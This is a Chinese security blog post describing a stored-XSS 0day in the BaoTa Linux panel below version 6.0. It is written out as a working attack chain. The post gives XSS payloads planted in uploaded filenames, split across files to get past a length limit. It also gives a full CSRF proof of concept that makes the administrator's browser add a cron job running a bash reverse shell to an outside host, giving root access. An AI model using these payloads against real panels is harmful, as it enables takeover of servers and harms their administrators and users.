宝塔linux面板 <6.0 存储形xss 0day漏洞

admin
admin
admin
138969
文章
114
评论
2021年8月2日22:39:17评论427 views字数 1829阅读6分5秒阅读模式

去年就挖到了,交了CVND。感觉现在用5.x版本的已经很少了。


通过以下命令来安装5.9版本宝塔面板


Centos安装命令:

yum install -y wget && wget -O install.sh http://download.bt.cn/install/install.sh && sh install.sh

Ubuntu/Deepin安装命令:

wget -O install.sh http://download.bt.cn/install/install-ubuntu.sh && sudo bash install.sh

假设我们已经通过网站漏洞或者ftp弱口令等,可以在web目录下进行文件上传


在web目录下上传一个文件名为 <img src=x onerror="alert(1)">的文件

宝塔linux面板 <6.0 存储形xss 0day漏洞

在宝塔后台浏览文件,触发payload

宝塔linux面板 <6.0 存储形xss 0day漏洞

但是由于宝塔的session加了httponly,所以我们是无法获取到宝塔的cookie的,但是我们可以配合计划任务的一个csrf的漏洞来达到权限提升的效果

POC

<html>  <!-- CSRF PoC - generated by Burp Suite Professional -->  <body>  <script>history.pushState('', '', '/')</script>    <form action="http://1.1.1.1:8888/crontab?action=AddCrontab" method="POST">      <input type="hidden" name="name" value="test" />      <input type="hidden" name="type" value="minute-n" />      <input type="hidden" name="where1" value="5" />      <input type="hidden" name="hour" value="" />      <input type="hidden" name="minute" value="" />      <input type="hidden" name="week" value="" />      <input type="hidden" name="sType" value="toShell" />      <input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />      <input type="hidden" name="sName" value="" />      <input type="hidden" name="backupTo" value="localhost" />      <input type="hidden" name="urladdress" value="" />      <input type="hidden" name="save" value="" />      <input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />      <input type="hidden" name="urladdress" value="" />      <input type="submit" id="a" value="Submit request" />    </form>  </body>  <script>    document.getElementById('a').click()</script></html>

修改poc中的ip地址,保存到网页上传到test.com中,当宝塔管理员访问这个页面以后,会自动跳转到

宝塔linux面板 <6.0 存储形xss 0day漏洞

后台会自动添加反弹shell的计划任务

宝塔linux面板 <6.0 存储形xss 0day漏洞

宝塔linux面板 <6.0 存储形xss 0day漏洞

现在准备就绪,只要让管理员打开这个网页就可以了

回到上传文件的地方,因为有触发点有字符数限制,所以用多个语句构造,因为执行顺序的关系,可能需要刷新一下文件管理即可触发

宝塔linux面板 <6.0 存储形xss 0day漏洞

新建三个文件,文件名分别为

a<img src=x onerror="a=String.fromCharCode(47)">b<img src=x onerror="b='.com'">c<img src=x onerror="window.open(a+a+'test'+b)">

payload触发以后会自动打开test.com网页

宝塔linux面板 <6.0 存储形xss 0day漏洞

将上一步CSRF的payload部署到test.com,管理员浏览文件的时候即可触发,触发后五分钟会反弹shell

宝塔linux面板 <6.0 存储形xss 0day漏洞

root权限~

本文始发于微信公众号(漏洞推送):宝塔linux面板 <6.0 存储形xss 0day漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月2日22:39:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   宝塔linux面板 <6.0 存储形xss 0day漏洞https://cn-sec.com/archives/406631.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息